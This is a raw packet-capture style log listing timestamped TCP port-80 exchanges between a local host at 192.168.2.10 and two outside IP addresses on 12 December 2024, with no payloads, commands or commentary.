Dec 12, 2024 16:48:47.386240959 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.386754990 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.387775898 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.387787104 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.387798071 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.387867928 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.387883902 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.388804913 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.388957977 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.389039040 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.389772892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.389836073 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.389913082 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.390824080 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.392106056 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.392117023 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.392131090 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.392198086 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.393143892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.393181086 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.394269943 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.394339085 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.394352913 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.394413948 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.394427061 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.395138025 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.447252035 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.483123064 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.483167887 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.483484983 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.483683109 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.483716965 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.483722925 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.483752966 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.484591007 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.484639883 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.484816074 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.484853029 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.485522032 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.485557079 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.485606909 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.485639095 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.486542940 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.486598015 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.486634970 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.487581968 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.487592936 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.487632990 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.488487005 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.488528967 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.489206076 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.489242077 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.489468098 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.489509106 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.489609003 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.490461111 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.490530014 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.490667105 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.490708113 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.491434097 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.491477966 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.491708040 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.492377043 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.492428064 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.492748976 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.492789984 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.493336916 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.493504047 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.493546009 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.494350910 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.494550943 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.494575024 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.494606018 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.495354891 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.495364904 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.495397091 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.495413065 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.496730089 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.496881962 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.496922016 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.497234106 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.497277021 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.497339010 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.497374058 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.498256922 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.498492002 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.498554945 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.499223948 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.499270916 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.499403954 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.499438047 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.500185966 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.500452995 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.500667095 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.500708103 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.501179934 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.501214981 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.501270056 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.501741886 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.502136946 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.502190113 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.502435923 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.502475023 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.503086090 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.503127098 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.503289938 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.503328085 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.504172087 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.504215956 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.504261971 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.504431009 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.505116940 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.505177021 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.505254984 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.505289078 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.506048918 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.506067991 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.506109953 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.507021904 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.507070065 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.507332087 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.507371902 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.507992029 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.508035898 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.508094072 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.508188963 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.509059906 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.509094954 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.509258032 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.509375095 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.511209965 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.511305094 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.511358976 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.511771917 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.512036085 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.512093067 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.512317896 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.512360096 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.512821913 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.512866974 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.512871027 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.512881994 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.512903929 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.512923002 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.513884068 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.513902903 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.513953924 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.514813900 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.514868975 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.515002966 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.515115023 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.515821934 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.515919924 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.515991926 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.515991926 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.516798973 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.516840935 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.517018080 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.517117023 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.517786980 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.517827034 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.517852068 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.517884016 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.518805981 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.518996000 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.519052029 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.519856930 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.519948959 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.520003080 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.520677090 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.520721912 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.521233082 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.521298885 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.521651983 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.521838903 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.521846056 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.521877050 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.522629023 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.522680998 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.523438931 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.523482084 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.523669958 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.523679972 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.523806095 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.523806095 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.524619102 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.524657011 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.525034904 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.525072098 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.525589943 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.525674105 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.525758028 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.525846958 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.526628017 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.526639938 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.526686907 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.527544975 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.527590990 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.527924061 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.528520107 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.528557062 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.528976917 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.529007912 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.529509068 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.529541969 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.529684067 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.529716015 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.530488014 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.530538082 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.530793905 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.530834913 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.531431913 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.531471968 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.531744003 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.531785011 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.532394886 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.532437086 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.532496929 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.532650948 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.533498049 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.533508062 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.533545017 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.534059048 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.534188986 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.534316063 CET	80	49957	185.215.113.16	192.168.2.10
Dec 12, 2024 16:48:47.534423113 CET	49957	80	192.168.2.10	185.215.113.16
Dec 12, 2024 16:48:47.534446955 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.534667015 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.534706116 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.534801006 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.535614014 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.535665035 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.535993099 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.536737919 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.536789894 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.536883116 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.537631989 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.537781954 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.538688898 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.538716078 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.538770914 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.538800001 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.539702892 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.539931059 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.540179968 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.540728092 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.540740013 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.540832043 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.541678905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.541896105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.542020082 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.542697906 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.542985916 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.543061018 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.543735981 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.543910980 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.543987989 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.544729948 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.544893980 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.544975042 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.545753002 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.546099901 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.546178102 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.546789885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.547182083 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.547265053 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.547766924 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.547923088 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.547996998 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.548815966 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.549001932 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.549081087 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.549809933 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.549984932 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.550074100 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.550906897 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.551928997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.551939964 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.551949024 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.552027941 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.552046061 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.552850008 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.553224087 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.553311110 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.553884029 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.554227114 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.554313898 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.554900885 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.555773973 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.555896997 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.555979013 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.556941032 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.556953907 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.556963921 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.557025909 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.557039976 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.557914972 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.558244944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.558321953 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.558936119 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.559951067 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.560015917 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.560024977 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.560079098 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.560100079 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.561014891 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.562187910 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.562284946 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.562702894 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.562815905 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.562894106 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.563343048 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.563455105 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.563716888 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.564028978 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.564644098 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.565053940 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.565171957 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.565758944 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.566070080 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.566081047 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.566159964 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.567132950 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.567166090 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.567912102 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.568155050 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.568161011 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.568242073 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.569155931 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.569165945 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.569252014 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.570095062 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.570244074 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.571204901 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.571316004 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.571742058 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.572144985 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.572268963 CET	49946	80	192.168.2.10	185.81.68.147
Dec 12, 2024 16:48:47.573194027 CET	80	49946	185.81.68.147	192.168.2.10
Dec 12, 2024 16:48:47.573205948 CET	80	49946	185.81.68.147	192.168.2.10
